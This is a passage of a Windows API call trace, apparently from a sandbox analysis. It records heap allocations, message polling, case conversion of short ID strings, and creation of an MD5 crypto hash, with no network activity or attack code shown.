hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0268.275] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0268.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0268.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0268.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0268.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.276] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.277] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.277] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0268.277] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.277] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0268.277] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.278] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.278] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.278] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.278] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.278] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.278] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0268.278] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.278] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0268.278] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.278] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.279] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.279] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.279] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0268.279] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.279] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.279] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0268.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0268.280] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0268.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.280] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0268.281] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.281] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0268.281] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.281] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0268.281] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.281] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.281] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.281] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.281] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.282] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.282] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.282] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0268.282] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.282] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0268.282] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.282] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.283] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.283] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.283] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0268.283] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.283] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.283] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.284] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.284] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.284] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.284] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0268.284] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0268.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.285] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0268.285] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.285] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.285] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0268.286] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 